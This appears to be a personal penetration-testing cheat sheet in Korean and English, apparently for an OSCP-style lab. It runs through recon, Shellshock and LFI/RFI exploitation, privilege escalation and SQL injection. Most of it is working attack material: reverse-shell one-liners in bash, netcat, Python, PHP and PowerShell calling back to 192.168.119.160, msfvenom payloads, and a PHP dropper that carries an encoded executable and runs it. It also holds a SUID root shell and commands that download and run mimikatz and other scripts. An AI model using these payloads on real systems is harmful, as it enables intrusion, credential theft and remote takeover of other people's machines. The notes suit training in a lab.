Get Proof :
$ echo " ";echo "uname -a:";uname -a;echo " ";echo "hostname:";hostname;echo " ";echo "id:";id;echo " ";echo "ifconfig:";/sbin/ifconfig -a;echo " ";echo "proof:";cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null;echo " "
0. Rules
Enum 작업이 핵심
> 정말 꼼꼼히 살펴야 한다.
한꺼번에 접근하면 놓치는 것이 생긴다
> 반드시 체크 리스트를 만들어 하나씩 확인한다.
발견한 취약점이 다양한 경우 반드시 리스트업 후 하나씩 접근한다
> 맞게 접근하고 있는데 약간의 사용법 미스로 안 되는 경우가 많다.
한 끗 차이다. 침착히 확인한다.
취약점 공략시 하나당 15분을 넘기지 않는다.
1. RECONNAISSANCE - Information Gathering
1. Port Scanning
a. Light Scan :
$ sudo nmap 10.11.1.71 --top-ports 100 --open
b. Heavy Scan :
$ sudo nmap 10.11.1.71 -A -p- --reason --dns-server
2. Services Scanning (Based on the nmap report)
a. 22번이 열려있다고 가정
$ sudo nc -nv 10.11.1.71 22 > OS: Ubuntu / Package: 2ubuntu2 / Using: OpenSSH v6.6 / 종합 : Ubuntu 14.04?
$ ssh root@10.11.1.71 > 접속 해보기
$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 bob@10.11.1.136
b. 80번이 열려있다고 가정
$ curl -i 10.11.1.71
: Small Summary
- IP : 10.11.1.x
- Ports : 22 / 80
- OS : Ubuntu 14.4
- Services & Applications: OpenSSH 6.6 / Apache 2.4.7 & PHP 5.5.9
- OPtions left (in order to priority) : Explore the web app / Search for vulns in the known services&apps / Brute force
3. 'End User' Info Gathering : Web Application (main)
a. $ curl -i -L 10.11.1.71 < 이거 돌리고 Start up a GUI web browser to see what the page looks like as a 'end user')
$ curl 10.11.1.71 -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//' (Web Application Internal & External links 확인)
$ curl 10.11.1.71 -s -L | html2text -width '77' | uniq (Web Application HTML Render)
b. SNS 연계된 것 모두 뒤져보기 (twitter & especially Github)
4. 'Hackers' Info Gathering Web Application (Hidden)
a. $ curl 10.11.1.71/robots.txt -s | html2text
b. URL Bruteforce (General) - Dirb / DirBuster / wfuzz / Gobuster
file list = /usr/share/seclists/, /usr/share/wordlists
$ gobuster dir -u http://10.11.1.71/ -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -s
'200,204,403,500' -e
$ gobuster dir -f -t 50 -x html,sh,pl -u http://10.11.1.115 -w /usr/share/wordlists/dirb/small.txt
c. Start researching vulnerabilities and issues in known software.
: Second Summary
1. Web Application - Bigtree CMS 4.0.6
2. Web Technologies - PHP 5.5.9
3. Web Server - Apache 2.4.7
4. SSH Service - OpenSSH 6.6
5. Database - MYSQL(Not sure on the version)
6. OS - Ubuntu (14.04? - Not sure on the version)
5. Search Exploits & CVEs
$ searchsploit OpenSSH 6 /
$ searchsploit Apache 2.4 | grep -v '/dos/'
$ searchsploit --colour -t php 5.x | grep -v '/dos/' | grep -vi '\.php'
$ searchsploit --colour -t php 5 | grep -vi '/dos/\|\.php[^$]' | grep -i '5\.\(5\|x\)'
$ searchsploit --colour -t php 5 | grep -vi '/dos/\|\.php[^$]' | grep -i '5\.\(5\|x\)' | \
grep -vi '/windows/\|PHP-Nuke\|RapidKill Pro\|Gift Registry\|Artiphp CMS'
$ searchsploit phpmyadmin | grep -v '/dos/'
$ searchsploit apache cgi | grep -v '/dos/'
2. EXPLOITATION
1. CGI (aka ShellShock)
a. $ curl -i http://10.11.1.71/cgi-bin/admin.cgi -s | html2text
LFI
$ curl 'http://10.11.1.71/cgi-bin/admin.cgi' -i -s > before
$ curl 'http://10.11.1.71/cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd' -i -s after
$ diff before after
$ searchsploit apache cgi | grep -v '/dos/'
$ nikto -h 10.11.1.71 > 결과에서 CVE 2014-6271 값 확인하기 (동일한 디렉터리에 두 개 이상의 CVE 있으면 유력)
b. Google : shellshcok poc
: PoC Request
: $ curl -H 'User-Agent: () { :; }; echo "CVE-2014-6271 vulnerable" bash -c id' http://10.11.1.71/cgi-bin/admin.cgi
> 출력이 되면 취약점 있는것 > ; 기호를 추가로 넣어보면
c. Target machine is vulnerable to shellshock. We have Remote Command Execution.
$ curl -H 'User-Agent: () { :; }; echo "+++++++++++++" ; /bin/bash -c whoami' http://10.11.1.71/cgi-bin/admin.cgi
$ curl -H "User-Agent: () { :; }; /bin/bash -c 'echo aaaa; uname -a; echo zzzz;'" http://10.11.1.71/cgi-bin/admin.cgi -s | sed -n '/aaaa/{:a;n;/zzzz/b;p;ba}'
$ curl -H "User-Agent: () { :; }; /bin/bash -c 'echo aaaa; nc -h 2>&1; echo zzzz;'" http://10.11.1.71/cgi-bin/admin.cgi -s | sed -n '/aaaa/{:a;n;/zzzz/b;p;ba}' (nc -h 사이에 공간 2칸)
쉘) $ curl -H "User-Agent: () { :; }; /bin/bash -c 'echo aaaa; bash -i >&/dev/tcp/192.168.119.160/444 0>&1; echo zzzz;'" http://10.11.1.71/cgi-bin/admin.cgi -s | sed -n '/aaaa/{:a;n;/zzzz/b;p;ba}'
d. Searchsploit 34900.py
$ sudo python shellshock.py payload=reverse rhost=10.11.1.71 lhost=192.168.119.160 lport=443 pages=/cgi-bin/test.cgi,/cgi-bin/admin.cgi
3. LINUX PRIVILEGE ESCALATION
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
z. export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
a. Infomation Gathering
a-1. Who are we?
$ id ; hostname ; hosname -I
a-2. Who uses box? What users?
$ ls -l /etc/passwd > 유저네임 확인후 ssh vrute force ($ grep -v 'nologin|false' /etc/passwd)
$ grep -vE "nologin|false" /etc/passwd
a-3. What's the OS? What version? What architecture?
$ cat /etc/*-release , uname -i
a-4. What's currently running on the box? What active network services are there?
$ ps aux , ps -ef , ps -eo command
$ netstat -antup (mysql 기동중인지 확인)
a-5. What's installed? What kernel is being used?
$ dpkg -l (Debian 계열) , rpm -qa (CentOS, openSUSE)
$ uname -a
a-6. Check list
$ ls -al /var
$ ls -al /opt
$ sudo -l (if All permission $ sudo su)
b. 정보수집 단계에서 확인한 db등 기동중인 서비스가 있었다면 관련 디렉토리로 이동후 정보 수집!
$ cd /var/www/html
$ find . -iname '*config*' | grep -R '$bigtree\["config"\]\["db"\]'
*중요* 비번이 mysql뿐이 아닌 유저 비번인 경우도 있으니 꼭 확인!
$ mysql -uroot -pzaq1xsw2cde3 -e 'show databases;' (interactive shell이 없기 때문에 접속 안될때)
c. /var 등에 특정 유저로 실행된 프로그램이 있는 경우 (ex./var/OSSEC-2.8)
c-1. 구글링 통해 기능 확인
c-2. searchsploit 통해 exploit 확인 ($ searchsploit ossec | grep -v '/dos/')
c-3. 파일 전송 : wget 또는 curl
$ curl 192.168.119.160/shell.pl > alpha-shell.pl
c-4. 명령어 찾을때
$ whereis perl
c-5 명령어 실행시 항상 절대 경로로 실행해버릇 하기.
$ /usr/bin/perl /tmp/alpha-shell.pl > 실행시 ssh로그인에 실패하라는 가이드가 나온다.
d. reverse shell
$ cp /usr/share/webshells/perl/perl-reverse-shell.pl alpha-shell.pl
$ sed -i 's/my $ip = .*;/my $ip = "192.168.119.160";/; s/my $port = .*;/my $port = 444;/' alpha-shell.pl
4. POST EXPLOITATION
a. Get proof.txt
b. Check User folders (# ls -lahR /home) > check "._history, .ssh, .php"
c. Check Hashes (# cat /etc/passwd)
d. Check Network Connection (# netstat -antp) (미리 했으면 건너뜀)
e. Database (미리 했으면 건너뜀)
컴파일
$ i686-w64-mingw32-gcc bypass.c -o eventvwr.exe -lws2_32
* 디스플레이 오류 *
Running GUI as another (non-root) user
: 루트 외 사용자로 접속해
display 출력이 필요한 프로그램 실행시
"Can't open display' 에러 날 때 해결책.
Need to share authentication from user1.
# cat ~/.Xauthority | sudo -u OS-94404 -i tee .Xauthority > /dev/null
Offline Exploit Resources
1. Searchsploit
경로 : /usr/share/exploitdb/exploits
2. Nmap NSE Scripts
경로 : /usr/share/nmap/scripts
사용법 : $ grep Exploits *.nse
$ nmap --script-help=clamav-exec.nse
3. Beef (The Browser Exploitation Framework) : 비번 J~~bb
4. The Metasploit Framework
LFI
(https://shahrukhathar.info/local-file-inclusion-lfi-cheat-sheet/)
LFI vulnerability using a PHP wrapper
http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.119.160",7979));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
RFI
test :
test : $ nc -lvnp 7979
타켓머신 : /index.php?file=http://192.168.119.160:7979/test.txt
공격
$ sudo python -m SimpleHTTPServer 80
$ weevely generate pass reverse.php
$ weevely http://10.11.1.35/section.php?page=http://192.168.119.160/reverse.php pass
RFI가 되지만
auto file extension 걸려있는 경우가 있음.
그 경우 우회할 방법을 찾아야함 -> (%00)을 활용하는 등..
또는 PHP Wrappers 테크닉을 사용해 LFI로 강제 전환
/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
rdp 3389 password bruteforce
$ crowbar --server 10.11.1.7/32 -b rdp -u pedro -C /usr/share/nmap/nselib/data/passwords.lst
1. 리버스쉘 세트 http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
nc -e /bin/bash 192.168.119.160 443
bash -i >&/dev/tcp/192.168.119.160/443 0>&1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.119.160",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php -r '$sock=fsockopen("192.168.119.160",443);exec("/bin/sh -i<&3 >&3 2>&3");'
/tmp # rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.119.160 443 >/tmp/f
callme_page.php?action=c&callmenum=1000@from-internal/n%0D%0AApplication: system%0D%0AData: perl -MIO -e '%24p%3dfork%3bexit%2cif(%24p)%3b%24c%3dnew IO%3a%3aSocket%3a%3aINET(PeerAddr%2c"192.168.119.160%3a443")%3bSTDIN->fdopen(%24c%2cr)%3b%24~->fdopen(%24c%2cw)%3bsystem%24_ while<>%3b'%0D%0A%0D%0A
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("13392.168.119.160",7979));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
echo 'import socket,subprocess,os' > test.py
echo 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM)' >> test.py
echo 's.connect(("10.10.14.13",8989))' >> test.py
echo 'os.dup2(s.fileno(),0)' >> test.py
echo 'os.dup2(s.fileno(),1)' >> test.py
echo 'os.dup2(s.fileno(),2)' >> test.py
echo 'p=subprocess.call(["/bin/sh","-i"])' >> test.py
+++윈도우 리버스 쉘 업로드 파일용+++
attack.php
<?php
header('Content-type: text/plain');
$ip = "192.168.119.160"; //change this
$port = "443"; //change this
$payload = "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";
$evalCode = gzinflate(base64_decode($payload));
$evalArguments = " ".$port." ".$ip;
$tmpdir ="C:\\windows\\temp"; // 업로드 경로로 바꿔야 함
chdir($tmpdir);
$res .= "Using dir : ".$tmpdir;
$filename = "shell.exe";
$file = fopen($filename, 'wb');
fwrite($file, $evalCode);
fclose($file);
$path = $filename;
$cmd = $path.$evalArguments;
$res .= "\n\nExecuting : ".$cmd."\n";
echo $res;
$output = system($cmd);
?>
++++Powershell reverse shell+++++
/home/OS-94404/labs/50/Invoke-PowerShellTcp.ps1
+One-Liner+
powershell.exe -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.160',7979);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell -nop -exec bypass -ep bypass -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.160',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell -c '$client = New-Object System.Net.Sockets.TcpClient(\"192.168.119.160\",7979);
>> $stream = $client.GetStream();
>> [byte[]]$bytes=0..65535|%{0};
>> while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0)
>> {
>> $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);
>> $sendback = (iex $data 2>&1 | Out-String);
>> $sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";
>> $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
>> $stream.Write($sendbyte,0,$sendbyte.Length);
>> $stream.Flush();
>> }
>> $client.Close();'
2. SUID 비트 (루트가 실행해 줘야함)
#include <stdio.h>
int main(void) {
setuid(0);
setgid(0);
system("/bin/bash");
}
컴파일 후 setuid 설정
chown root:root /dev/shm/taku/takuattack; chmod 4755 /dev/shm/taku/takuattack
파일 실행하면 루트
3. vi 편집기 오류 설정
침투 후 python -c import.. 후 작업
터미널에 방향키등이 이상문자로 나올때 (zsh에서는 안됨)
$ ctrl + z 로 백그라운드 돌려놓고
# stty raw -echo
# nc -lvnp 7979
f + g + enter로 포그라운드로 복귀 하면 됨
경우에 따라서
LFI 구문
Windows
menu.php?file=c:\windows\system32\drivers\etc\hosts
debug.php?id=1 union all select 1, 2, "<?php echo '<pre>' . shell_exec($_GET['cmd']);?> . '</pre>';?>" into OUTFILE "c:/xampp/htdocs/backdoor.php"
RFI 가능한 경우
weevely 사용
Payload & multi/handler
**** Linux ****
* non-staged
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.119.160 LPORT=7979 -f elf > non_staged.elf
* staged
msfvenom -p linux/x64/shell/reverse_tcp LHOST=192.168.119.160 LPORT=7979 -f elf > staged.elf
* meterpreter(staged)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.119.160 LPORT=4444 -f exe > meter_reverse.exe
**** Windows ****
* non-staged
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
* staged
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
* meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.160 LPORT=4444 -e x86/shikata_ga_nai -f exe > meter_reverse.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.160 LPORT=4444 -f exe > meter_reverse.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.160 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > meter_reverse.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.160 LPORT=4444 -f powershell
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.160 LPORT=7979 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o reverse_emb.exe
**** multi/handler ****
msfconsole -q -x "use exploit/multi/handler; set RHOST 192.168.160.10; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.160; exploit"
윈도우 파일 다운방법
1. powershell one-liner
python -m SimpleHTTPServer 띄운 후
실행 파일 검색 where /r c:\windows powershell.exe
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.160:8000/mimikatz.exe', 'c:\Users\Public\mimi.exe');
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.160:8000/mimikatz.exe', 'c:\Users\Public\mimi.exe')
++++ Command Execution용 +++++
GET /?search=%00{.exec|C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://192.168.119.160:8000/Invoke-PowerShellTcp.ps1').} HTTP/1.1
++++ Powershell에서 다운 및 실행 +++++++
IEX(New-Object Net.WebClient).DownloadString('http://192.168.119.160:80/Sherlock.ps1')
+++ Windows PE ++++++ (50번 폴더) Ippsec Optimum 참조 : https://www.youtube.com/watch?v=kWTnVBIpNsE
기본 리버스 쉘 스크립트
> Invoke-PowerShellTcp.ps1 > 제일 하단에 IP랑 port 설정
취약점 검색 스크립트
> Shelock.ps1 > 제일 하단에 Find-AllVulns 설정
MS-16032 취약점 있는 경우
> Invoke-MS16032.ps1
: 제일 하단에 추가 : Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://192.168.119.160:80/shell.ps1')"
: shell.ps1 파일 별도로 추가 (위에있는 Invoke-PowerShellTcp.ps1 복사해 쓰면 됨)
wordpress plugin upload
SQL injection (union bases oracle)
http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
https://guide.offsecnewbie.com/5-sql
http://www.securityidiots.com/Web-Pentest/SQL-Injection/Union-based-Oracle-Injection.html
http://egloos.zum.com/totoriver/v/3012348
0. List Users
▶ 'or 1=1 union select name,null FROM master..syslogins--
1. Enumerate columns
'or 1=1 order by 3 --
2. Find type of columns 문자 혹 숫자
'or 1=1 union select null,null,null from dual --
'or 1=1 union select '1111',null,null from dual --
'or 1=1 union select user,null,null from dual --
3. Extract table names
'or 1=1 union select tablie_name,null,null from all_tables --
'or 1=1 union select table_name,null FROM information_schema.tables --
4. Extract Column names:
'or 1=1 union select column_name,null from information_schema.columns where table_name='users' -- --
'or 1=1 union select column_name,null,null from all_tab_columns where table_name='WEB_ADMINS' --
5. Admin name and password :
'or 1=1 union select ADMIN_NAME,PASSWORD,PASSWORD,null from WEB_ADMINS --
▶ 'or 1=1 union select name, from users --
▶ 'or 1=1 union select pass,null from users --
6. find injectable parameter with time delays
'or 1=1 ; WAITFOR DELAY '0:0:5' --
